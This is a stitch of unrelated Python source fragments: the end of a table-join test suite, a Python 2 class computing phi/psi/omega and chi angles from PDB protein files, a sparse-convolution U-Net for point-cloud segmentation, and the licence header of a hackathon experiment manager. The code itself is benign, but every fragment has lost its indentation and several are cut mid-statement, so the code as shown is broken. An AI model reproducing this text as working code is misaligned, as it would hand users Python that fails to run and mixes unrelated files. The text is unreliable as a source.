"""Merge on a key column that doesn't exist"""
t1 = self.t1
t2 = self.t2
with pytest.raises(TableMergeError):
table.join(t1, t2, keys=['a', 'not there'])
def test_bad_join_type(self):
"""Bad join_type input"""
t1 = self.t1
t2 = self.t2
with pytest.raises(ValueError):
table.join(t1, t2, join_type='illegal value')
def test_no_common_keys(self):
"""Merge tables with no common keys"""
t1 = self.t1
t2 = self.t2
del t1['a']
del t1['b']
del t2['a']
del t2['b']
with pytest.raises(TableMergeError):
table.join(t1, t2)
def test_masked_key_column(self):
"""Merge on a key column that has a masked element"""
t1 = self.t1
t2 = Table(self.t2, masked=True)
table.join(t1, t2) # OK
t2['a'].mask[0] = True
with pytest.raises(TableMergeError):
table.join(t1, t2)
def test_col_meta_merge(self):
t1 = self.t1
t2 = self.t2
t2.rename_column('d', 'c') # force col conflict and renaming
meta1 = OrderedDict([('b', [1, 2]), ('c', {'a': 1}), ('d', 1)])
meta2 = OrderedDict([('b', [3, 4]), ('c', {'b': 1}), ('a', 1)])
# Key col 'a', should first value ('cm')
t1['a'].unit = 'cm'
t2['a'].unit = 'm'
# Key col 'b', take first value 't1_b'
t1['b'].description = 't1_b'
# Key col 'b', take first non-empty value 't1_b'
t2['b'].format | |
<gh_stars>1-10
import math
import sys
from math_utils import *
from names import *
from bio_pdb import PDBParser
from bio_pdb import is_aa
from bio_pdb import calc_dihedral
class PDB:
""" Usually instantiated from something like:
pdbfile = fragbuilder.PDB("1UBQ.pdb")
"""
def __init__(self, pdbfile):
""" Wrapper class for Bio.PDB which makes it convenient to
read phi/psi/omega/chi torsion angles from a PDB-file.
Arguments:
pdbfile -- The PDB file you wish to read.
"""
try:
self._parser = PDBParser(QUIET=True)
except:
# Workaround for missing QUIET keyword
# in certain versions of Biopython.
self._parser = PDBParser()
self._pdbfile = pdbfile
self._structure = self._parser.get_structure("pdb", self._pdbfile)
self._chain = self._get_first_chain(self._structure)
self._sequence = self._get_sequence_from_chain(self._chain)
def get_length(self):
""" Returns the length of the protein.
"""
length = 0
for residue in self._chain:
if is_aa(residue):
length += 1
return length
def get_residue_numbers(self):
""" Returns a list with indexes of all amino acids in the chain.
Can be used for iterating over residues, e.g.:
>>> for i in pdbfile.get_residue_numbers():
... print i, pdbfile.get_residue_bb_angles(i)
"""
length = self.get_length()
return range(1, length + 1)
def get_chi_angles(self, resnum):
""" Returns a list of chi angles for a residue.
Arguments:
resnum -- The number of the residue.
NOTE: Also corrects for incorrect naming of CG1/CG2 in
valine residues and CD1/CD2 in leucine residues.
Will display an error if .pdb file is incorrect.
"""
angles_rad = self._get_chi(self._chain[resnum])
angles_deg = [angle * RAD_TO_DEG for angle in angles_rad]
return angles_deg
def get_bb_angles(self, resnum):
""" Returns a list of [phi, psi, omega] angles for a residue.
Arguments:
resnum -- The number of the residue.
"""
length = self.get_length()
angles_deg = []
if resnum == 1:
res_1 = self._chain[resnum]
res_2 = self._chain[resnum + 1]
N1 = res_1['N' ].get_vector()
CA1 = res_1['CA'].get_vector()
C1 = res_1['C' ].get_vector()
N2 = res_2['N' ].get_vector()
phi = None
psi = calc_dihedral(N1, CA1, C1, N2) * RAD_TO_DEG
omega = None
angles_deg = [phi, psi, omega]
elif resnum == length:
res_0 = self._chain[resnum - 1]
res_1 = self._chain[resnum]
CA0 = res_0['CA'].get_vector()
C0 = res_0['C' ].get_vector()
N1 = res_1['N' ].get_vector()
CA1 = res_1['CA'].get_vector()
C1 = res_1['C' ].get_vector()
phi = calc_dihedral(C0, N1, CA1, C1) * RAD_TO_DEG
psi = None
omega = calc_dihedral(CA0, C0, N1, CA1) * RAD_TO_DEG
angles_deg = [phi, psi, omega]
else:
res_0 = self._chain[resnum - 1]
res_1 = self._chain[resnum]
res_2 = self._chain[resnum + 1]
CA0 = res_0['CA'].get_vector()
C0 = res_0['C' ].get_vector()
N1 = res_1['N' ].get_vector()
CA1 = res_1['CA'].get_vector()
C1 = res_1['C' ].get_vector()
N2 = res_2['N' ].get_vector()
phi = calc_dihedral(C0, N1, CA1, C1) * RAD_TO_DEG
psi = calc_dihedral(N1, CA1, C1, N2) * RAD_TO_DEG
omega = calc_dihedral(CA0, C0, N1, CA1) * RAD_TO_DEG
angles_deg = [phi, psi, omega]
return angles_deg
def _get_chi(self, residue):
""" Returns a list of chi angles for a residue """
if residue.get_resname() == 'ALA':
return []
if residue.get_resname() == 'GLY':
return []
if residue.get_resname() == 'ARG':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD'].get_vector()
sc_atom6 = residue['NE'].get_vector()
sc_atom7 = residue['CZ'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
chi3 = calc_dihedral(sc_atom3, sc_atom4, sc_atom5, sc_atom6)
chi4 = calc_dihedral(sc_atom4, sc_atom5, sc_atom6, sc_atom7)
return [chi1, chi2, chi3, chi4]
if residue.get_resname() == 'ASN':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['OD1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'ASP':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['OD1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'CYS':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['SG'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
return [chi1]
if residue.get_resname() == 'GLU':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD'].get_vector()
sc_atom6 = residue['OE1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
chi3 = calc_dihedral(sc_atom3, sc_atom4, sc_atom5, sc_atom6)
return [chi1, chi2, chi3]
if residue.get_resname() == 'GLN':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD'].get_vector()
sc_atom6 = residue['OE1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
chi3 = calc_dihedral(sc_atom3, sc_atom4, sc_atom5, sc_atom6)
return [chi1, chi2, chi3]
if residue.get_resname() == 'HIS':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD2'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'ILE':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG1'].get_vector()
sc_atom5 = residue['CD1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'LEU':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD1'].get_vector()
sc_atom5_b = residue['CD2'].get_vector()
# Check for correct naming of CD1/CD2
check_angle = calc_dihedral(sc_atom5, sc_atom4, sc_atom3, sc_atom5_b)
# If the naming of the CD1 and CD2 atoms is correct,
# the check_angle will be around -120 deg. If the names
# are swapped, the angle will be around 120 deg.
if check_angle > 0:
sc_atom5 = sc_atom5_b
print "WARNING: Correcting for incorrect naming of CD1 and CD2 in residue LEU%i." % residue.get_id()[1]
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'LYS':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD'].get_vector()
sc_atom6 = residue['CE'].get_vector()
sc_atom7 = residue['NZ'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
chi3 = calc_dihedral(sc_atom3, sc_atom4, sc_atom5, sc_atom6)
chi4 = calc_dihedral(sc_atom4, sc_atom5, sc_atom6, sc_atom7)
return [chi1, chi2, chi3, chi4]
if residue.get_resname() == 'MET':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['SD'].get_vector()
sc_atom6 = residue['CE'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
chi3 = calc_dihedral(sc_atom3, sc_atom4, sc_atom5, sc_atom6)
return [chi1, chi2, chi3]
if residue.get_resname() == 'PHE':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'PRO':
# sc_atom1 = residue['N'].get_vector()
# sc_atom2 = residue['CA'].get_vector()
# sc_atom3 = residue['CB'].get_vector()
# sc_atom4 = residue['CG'].get_vector()
# sc_atom5 = residue['CD'].get_vector()
# chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
# chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
# chi3 = calc_dihedral(sc_atom3, sc_atom4, sc_atom5, sc_atom1)
# chi4 = calc_dihedral(sc_atom4, sc_atom5, sc_atom1, sc_atom2)
# return [chi1, chi2, chi3, chi4]
return []
if residue.get_resname() == 'SER':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['OG'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
return [chi1]
if residue.get_resname() == 'THR':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['OG1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
return [chi1]
if residue.get_resname() == 'TRP':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'TYR':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG'].get_vector()
sc_atom5 = residue['CD1'].get_vector()
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
chi2 = calc_dihedral(sc_atom2, sc_atom3, sc_atom4, sc_atom5)
return [chi1, chi2]
if residue.get_resname() == 'VAL':
sc_atom1 = residue['N'].get_vector()
sc_atom2 = residue['CA'].get_vector()
sc_atom3 = residue['CB'].get_vector()
sc_atom4 = residue['CG1'].get_vector()
sc_atom4_b = residue['CG2'].get_vector()
# Check for correct naming of CG1/CG2
check_angle = calc_dihedral(sc_atom4, sc_atom3, sc_atom2, sc_atom4_b)
# If the naming of the CG1 and CG2 atoms is correct,
# the check_angle will be around -120 deg. If the names
# are swapped, the angle will be around 120 deg.
if check_angle > 0:
sc_atom4 = sc_atom4_b
print "WARNING: Correcting for incorrect naming of CG1 and CG2 in residue VAL%i." % residue.get_id()[1]
chi1 = calc_dihedral(sc_atom1, sc_atom2, sc_atom3, sc_atom4)
return [chi1]
else:
return "FAILLLL"
def _get_first_chain(self, structure):
""" Returns the first chain in a Bio.PDB structure object """
for model in structure:
for chain in model:
return chain
| |
# -*- coding:utf-8 -*-
# author: Xinge
# @file: spconv_unet.py
# @time: 2020/06/22 15:01
import time
import numpy as np
import spconv
import torch
import torch.nn.functional as F
from torch import nn
def conv3x3(in_planes, out_planes, stride=1, indice_key=None):
return spconv.SubMConv3d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False, indice_key=indice_key)
def conv1x3(in_planes, out_planes, stride=1, indice_key=None):
return spconv.SubMConv3d(in_planes, out_planes, kernel_size=(1, 3, 3), stride=stride,
padding=(0, 1, 1), bias=False, indice_key=indice_key)
def conv1x1x3(in_planes, out_planes, stride=1, indice_key=None):
return spconv.SubMConv3d(in_planes, out_planes, kernel_size=(1, 1, 3), stride=stride,
padding=(0, 0, 1), bias=False, indice_key=indice_key)
def conv1x3x1(in_planes, out_planes, stride=1, indice_key=None):
return spconv.SubMConv3d(in_planes, out_planes, kernel_size=(1, 3, 1), stride=stride,
padding=(0, 1, 0), bias=False, indice_key=indice_key)
def conv3x1x1(in_planes, out_planes, stride=1, indice_key=None):
return spconv.SubMConv3d(in_planes, out_planes, kernel_size=(3, 1, 1), stride=stride,
padding=(1, 0, 0), bias=False, indice_key=indice_key)
def conv3x1(in_planes, out_planes, stride=1, indice_key=None):
return spconv.SubMConv3d(in_planes, out_planes, kernel_size=(3, 1, 3), stride=stride,
padding=(1, 0, 1), bias=False, indice_key=indice_key)
def conv1x1(in_planes, out_planes, stride=1, indice_key=None):
return spconv.SubMConv3d(in_planes, out_planes, kernel_size=1, stride=stride,
padding=1, bias=False, indice_key=indice_key)
class ResContextBlock(nn.Module):
def __init__(self, in_filters, out_filters, kernel_size=(3, 3, 3), stride=1, indice_key=None):
super(ResContextBlock, self).__init__()
self.conv1 = conv1x3(in_filters, out_filters, indice_key=indice_key+"bef")
self.bn0 = nn.BatchNorm1d(out_filters)
self.act1 = nn.LeakyReLU()
self.conv1_2 = conv3x1(out_filters, out_filters, indice_key=indice_key+"bef")
self.bn0_2 = nn.BatchNorm1d(out_filters)
self.act1_2 = nn.LeakyReLU()
self.conv2 = conv3x1(in_filters, out_filters, indice_key=indice_key+"bef")
self.act2 = nn.LeakyReLU()
self.bn1 = nn.BatchNorm1d(out_filters)
self.conv3 = conv1x3(out_filters, out_filters, indice_key=indice_key+"bef")
self.act3 = nn.LeakyReLU()
self.bn2 = nn.BatchNorm1d(out_filters)
def forward(self, x):
shortcut = self.conv1(x)
shortcut.features = self.act1(shortcut.features)
shortcut.features = self.bn0(shortcut.features)
shortcut = self.conv1_2(shortcut)
shortcut.features = self.act1_2(shortcut.features)
shortcut.features = self.bn0_2(shortcut.features)
resA = self.conv2(x)
resA.features = self.act2(resA.features)
resA.features = self.bn1(resA.features)
resA = self.conv3(resA)
resA.features = self.act3(resA.features)
resA.features = self.bn2(resA.features)
resA.features = resA.features + shortcut.features
return resA
class ResBlock(nn.Module):
def __init__(self, in_filters, out_filters, dropout_rate, kernel_size=(3, 3, 3), stride=1,
pooling=True, drop_out=True, height_pooling=False, indice_key=None):
super(ResBlock, self).__init__()
self.pooling = pooling
self.drop_out = drop_out
self.conv1 = conv3x1(in_filters, out_filters, indice_key=indice_key+"bef")
self.act1 = nn.LeakyReLU()
self.bn0 = nn.BatchNorm1d(out_filters)
self.conv1_2 = conv1x3(out_filters, out_filters, indice_key=indice_key+"bef")
self.act1_2 = nn.LeakyReLU()
self.bn0_2 = nn.BatchNorm1d(out_filters)
self.conv2 = conv1x3(in_filters, out_filters, indice_key=indice_key+"bef")
self.act2 = nn.LeakyReLU()
self.bn1 = nn.BatchNorm1d(out_filters)
self.conv3 = conv3x1(out_filters, out_filters, indice_key=indice_key+"bef")
self.act3 = nn.LeakyReLU()
self.bn2 = nn.BatchNorm1d(out_filters)
# self.conv4 = conv3x3(out_filters, out_filters, indice_key=indice_key+"bef")
# self.act4 = nn.LeakyReLU()
# self.bn4 = nn.BatchNorm1d(out_filters)
if pooling:
# self.dropout = nn.Dropout3d(p=dropout_rate)
if height_pooling:
# self.pool = spconv.SparseMaxPool3d(kernel_size=2, stride=2)
self.pool = spconv.SparseConv3d(out_filters, out_filters, kernel_size=3, stride=2,
padding=1, indice_key=indice_key, bias=False)
else:
# self.pool = spconv.SparseMaxPool3d(kernel_size=(2,2,1), stride=(2, 2, 1))
self.pool = spconv.SparseConv3d(out_filters, out_filters, kernel_size=3, stride=(2,2,1),
padding=1, indice_key=indice_key, bias=False)
# else:
# self.dropout = nn.Dropout3d(p=dropout_rate)
def forward(self, x):
shortcut = self.conv1(x)
shortcut.features = self.act1(shortcut.features)
shortcut.features = self.bn0(shortcut.features)
shortcut = self.conv1_2(shortcut)
shortcut.features = self.act1_2(shortcut.features)
shortcut.features = self.bn0_2(shortcut.features)
resA = self.conv2(x)
resA.features = self.act2(resA.features)
resA.features = self.bn1(resA.features)
resA = self.conv3(resA)
resA.features = self.act3(resA.features)
resA.features = self.bn2(resA.features)
resA.features = resA.features + shortcut.features
# resA = self.conv4(resA)
# resA.features = self.act4(resA.features)
# resA.features = self.bn4(resA.features)
if self.pooling:
# if self.drop_out:
# resB = self.dropout(resA.features)
# else:
# resB = resA
resB = self.pool(resA)
return resB, resA
else:
# if self.drop_out:
# resB = self.dropout(resA)
# else:
# resB = resA
return resA
class UpBlock(nn.Module):
def __init__(self, in_filters, out_filters, kernel_size=(3, 3, 3), indice_key=None, up_key=None):
super(UpBlock, self).__init__()
# self.drop_out = drop_out
#self.trans = nn.ConvTranspose2d(in_filters, out_filters, kernel_size, stride=(2, 2), padding=1)
self.trans_dilao = conv3x3(in_filters, out_filters, indice_key=indice_key+"new_up")
self.trans_act = nn.LeakyReLU()
self.trans_bn = nn.BatchNorm1d(out_filters)
# self.dropout1 = nn.Dropout3d(p=dropout_rate)
# self.dropout2 = nn.Dropout3d(p=dropout_rate)
self.conv1 = conv1x3(out_filters, out_filters, indice_key=indice_key)
self.act1 = nn.LeakyReLU()
self.bn1 = nn.BatchNorm1d(out_filters)
self.conv2 = conv3x1(out_filters, out_filters, indice_key=indice_key)
self.act2 = nn.LeakyReLU()
self.bn2 = nn.BatchNorm1d(out_filters)
self.conv3 = conv3x3(out_filters, out_filters, indice_key=indice_key)
self.act3 = nn.LeakyReLU()
self.bn3 = nn.BatchNorm1d(out_filters)
# self.dropout3 = nn.Dropout3d(p=dropout_rate)
self.up_subm = spconv.SparseInverseConv3d(out_filters, out_filters, kernel_size=3, indice_key=up_key, bias=False)
def forward(self, x, skip):
upA = self.trans_dilao(x)
#if upA.shape != skip.shape:
# upA = F.pad(upA, (0, 1, 0, 1), mode='replicate')
upA.features = self.trans_act(upA.features)
upA.features = self.trans_bn(upA.features)
## upsample
upA = self.up_subm(upA)
# upA = F.interpolate(upA, size=skip.size()[2:], mode='trilinear', align_corners=True)
# if self.drop_out:
# upA = self.dropout1(upA)
upA.features = upA.features + skip.features
# if self.drop_out:
# upB = self.dropout2(upB)
upE = self.conv1(upA)
upE.features = self.act1(upE.features)
upE.features = self.bn1(upE.features)
upE = self.conv2(upE)
upE.features = self.act2(upE.features)
upE.features = self.bn2(upE.features)
upE = self.conv3(upE)
upE.features = self.act3(upE.features)
upE.features = self.bn3(upE.features)
# if self.drop_out:
# upE = self.dropout3(upE)
return upE
class ReconBlock(nn.Module):
def __init__(self, in_filters, out_filters, kernel_size=(3, 3, 3), stride=1, indice_key=None):
super(ReconBlock, self).__init__()
self.conv1 = conv3x1x1(in_filters, out_filters, indice_key=indice_key+"bef")
self.bn0 = nn.BatchNorm1d(out_filters)
self.act1 = nn.Sigmoid()
self.conv1_2 = conv1x3x1(in_filters, out_filters, indice_key=indice_key+"bef")
self.bn0_2 = nn.BatchNorm1d(out_filters)
self.act1_2 = nn.Sigmoid()
self.conv1_3 = conv1x1x3(in_filters, out_filters, indice_key=indice_key+"bef")
self.bn0_3 = nn.BatchNorm1d(out_filters)
self.act1_3 = nn.Sigmoid()
# self.conv2 = conv3x1(in_filters, out_filters, indice_key=indice_key+"bef")
# self.act2 = nn.LeakyReLU()
# self.bn1 = nn.BatchNorm1d(out_filters)
#
# self.conv3 = conv1x3(out_filters, out_filters, indice_key=indice_key+"bef")
# self.act3 = nn.LeakyReLU()
# self.bn2 = nn.BatchNorm1d(out_filters)
def forward(self, x):
shortcut = self.conv1(x)
shortcut.features = self.bn0(shortcut.features)
shortcut.features = self.act1(shortcut.features)
shortcut2 = self.conv1_2(x)
shortcut2.features = self.bn0_2(shortcut2.features)
shortcut2.features = self.act1_2(shortcut2.features)
shortcut3 = self.conv1_3(x)
shortcut3.features = self.bn0_3(shortcut3.features)
shortcut3.features = self.act1_3(shortcut3.features)
# resA = self.conv2(x)
# resA.features = self.act2(resA.features)
# resA.features = self.bn1(resA.features)
#
# resA = self.conv3(resA)
# resA.features = self.act3(resA.features)
# resA.features = self.bn2(resA.features)
shortcut.features = shortcut.features + shortcut2.features + shortcut3.features
shortcut.features = shortcut.features * x.features
return shortcut
class Spconv_salsaNet_res_cfg(nn.Module):
def __init__(self, cfg):
super(Spconv_salsaNet_res_cfg, self).__init__()
output_shape = cfg.DATA_CONFIG.DATALOADER.GRID_SIZE
if 'FEATURE_COMPRESSION' in cfg.MODEL.MODEL_FN:
num_input_features = cfg.MODEL.MODEL_FN.FEATURE_COMPRESSION
else:
num_input_features = cfg.DATA_CONFIG.DATALOADER.GRID_SIZE[2]
nclasses = cfg.DATA_CONFIG.NCLASS
n_height = cfg.DATA_CONFIG.DATALOADER.GRID_SIZE[2]
init_size = cfg.MODEL.BACKBONE.INIT_SIZE
self.nclasses = nclasses
self.nheight = n_height
self.strict = False
sparse_shape = np.array(output_shape)
# sparse_shape[0] = 11
self.sparse_shape = sparse_shape
self.downCntx = ResContextBlock(num_input_features, init_size, indice_key="pre")
# self.resBlock1 = ResBlock(init_size, init_size, 0.2, pooling=True, height_pooling=True, indice_key="down1")
self.resBlock2 = ResBlock(init_size, 2 * init_size, 0.2, height_pooling=True, indice_key="down2")
self.resBlock3 = ResBlock(2 * init_size, 4 * init_size, 0.2, height_pooling=True, indice_key="down3")
self.resBlock4 = ResBlock(4 * init_size, 8 * init_size, 0.2, pooling=True, height_pooling=False, indice_key="down4")
self.resBlock5 = ResBlock(8 * init_size, 16 * init_size, 0.2, pooling=True, height_pooling=False, indice_key="down5")
# self.resBlock6 = ResBlock(16 * init_size, 16 * init_size, 0.2, pooling=False, height_pooling=False, indice_key="down6")
# self.ReconNet = ReconBlock(16 * init_size, 16 * init_size, indice_key="recon")
self.upBlock0 = UpBlock(16 * init_size, 16 * init_size, indice_key="up0", up_key="down5")
self.upBlock1 = UpBlock(16 * init_size, 8 * init_size, indice_key="up1", up_key="down4")
self.upBlock2 = UpBlock(8 * init_size, 4 * init_size, indice_key="up2", up_key="down3")
self.upBlock3 = UpBlock(4 * init_size, 2 * init_size, indice_key="up3", up_key="down2")
# self.upBlock4 = UpBlock(4 * init_size, 2 * init_size, indice_key="up4", up_key="down2")
# self.upBlock5 = UpBlock(2 * init_size, init_size, indice_key="up5", up_key="down1")
self.ReconNet = ReconBlock(2*init_size, 2*init_size, indice_key="recon")
def forward(self, voxel_features, coors, batch_size):
# x = x.contiguous()
coors = coors.int()
ret = spconv.SparseConvTensor(voxel_features, coors, self.sparse_shape,
batch_size)
ret = self.downCntx(ret)
# down0c, down0b = self.resBlock1(ret)
down1c, down1b = self.resBlock2(ret)
down2c, down2b = self.resBlock3(down1c)
down3c, down3b = self.resBlock4(down2c)
down4c, down4b = self.resBlock5(down3c)
# down5b = self.resBlock6(down4c)
# down6b = self.ReconNet(down5b)
up4e = self.upBlock0(down4c, down4b)
up3e = self.upBlock1(up4e, down3b)
up2e = self.upBlock2(up3e, down2b)
up1e = self.upBlock3(up2e, down1b)
up0e = self.ReconNet(up1e)
up0e.features = torch.cat((up0e.features, up1e.features), 1) # size 4 * init_size --> OK with the size of the semantic and instance heads
return up0e, up0e
class Spconv_sem_logits_head_cfg(nn.Module):
def __init__(self, cfg):
super(Spconv_sem_logits_head_cfg, self).__init__()
output_shape = cfg.DATA_CONFIG.DATALOADER.GRID_SIZE
if 'FEATURE_COMPRESSION' in cfg.MODEL.MODEL_FN:
num_input_features = cfg.MODEL.MODEL_FN.FEATURE_COMPRESSION
else:
num_input_features = cfg.DATA_CONFIG.DATALOADER.GRID_SIZE[2]
nclasses = cfg.DATA_CONFIG.NCLASS
n_height = cfg.DATA_CONFIG.DATALOADER.GRID_SIZE[2]
init_size = cfg.MODEL.BACKBONE.INIT_SIZE
self.logits = spconv.SubMConv3d(4 * init_size, nclasses, indice_key="logit", kernel_size=3, stride=1, padding=1, bias=True)
def forward(self, fea):
logits = self.logits(fea)
return logits.dense()
class Spconv_ins_offset_concatxyz_threelayers_head_cfg(nn.Module):
def __init__(self, cfg):
super(Spconv_ins_offset_concatxyz_threelayers_head_cfg, self).__init__()
init_size = cfg.MODEL.BACKBONE.INIT_SIZE
self.pt_fea_dim = 4 * init_size
self.embedding_dim = cfg.MODEL.INS_HEAD.EMBEDDING_CHANNEL
self.conv1 = conv3x3(self.pt_fea_dim, self.pt_fea_dim, indice_key='offset_head_conv1')
self.bn1 = nn.BatchNorm1d(self.pt_fea_dim)
self.act1 = nn.LeakyReLU()
self.conv2 = conv3x3(self.pt_fea_dim, 2 * init_size, indice_key='offset_head_conv2')
self.bn2 = nn.BatchNorm1d(2 * init_size)
self.act2 = nn.LeakyReLU()
self.conv3 = conv3x3(2 * init_size, init_size, indice_key='offset_head_conv3')
self.bn3 = nn.BatchNorm1d(init_size)
self.act3 = nn.LeakyReLU()
self.offset = nn.Sequential(
nn.Linear(init_size+3, init_size, bias=True),
nn.BatchNorm1d(init_size),
nn.ReLU()
)
self.offset_linear = nn.Linear(init_size, self.embedding_dim, bias=True)
def forward(self, fea, batch):
fea = self.conv1(fea)
fea.features = self.act1(self.bn1(fea.features))
fea = self.conv2(fea)
fea.features = self.act2(self.bn2(fea.features))
fea = self.conv3(fea)
fea.features = self.act3(self.bn3(fea.features))
grid_ind = batch['grid']
xyz = batch['pt_cart_xyz']
fea = fea.dense()
fea = fea.permute(0, 2, 3, 4, 1)
pt_ins_fea_list = []
for batch_i, grid_ind_i in enumerate(grid_ind):
pt_ins_fea_list.append(fea[batch_i, grid_ind[batch_i][:,0], grid_ind[batch_i][:,1], grid_ind[batch_i][:,2]])
pt_pred_offsets_list = []
for batch_i, pt_ins_fea in enumerate(pt_ins_fea_list):
pt_pred_offsets_list.append(self.offset_linear(self.offset(torch.cat([pt_ins_fea,torch.from_numpy(xyz[batch_i]).cuda()],dim=1))))
return pt_pred_offsets_list, pt_ins_fea_list
class Spconv_alsaNet_res(nn.Module):
def __init__(self,
output_shape,
use_norm=True,
num_input_features=128,
nclasses = 20, n_height = 32, strict=False, init_size=16):
super(Spconv_alsaNet_res, self).__init__()
self.nclasses = nclasses
self.nheight = n_height
self.strict = False
sparse_shape = np.array(output_shape)
# sparse_shape[0] = 11
print(sparse_shape)
self.sparse_shape = sparse_shape
self.downCntx = ResContextBlock(num_input_features, init_size, indice_key="pre")
# self.resBlock1 | |
<reponame>akondasif/open-hackathon-bak_01<filename>open-hackathon-server/src/hackathon/expr/expr_mgr.py
# -*- coding: utf-8 -*-
#
# -----------------------------------------------------------------------------------
# Copyright (c) Microsoft Open Technologies (Shanghai) Co. Ltd. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
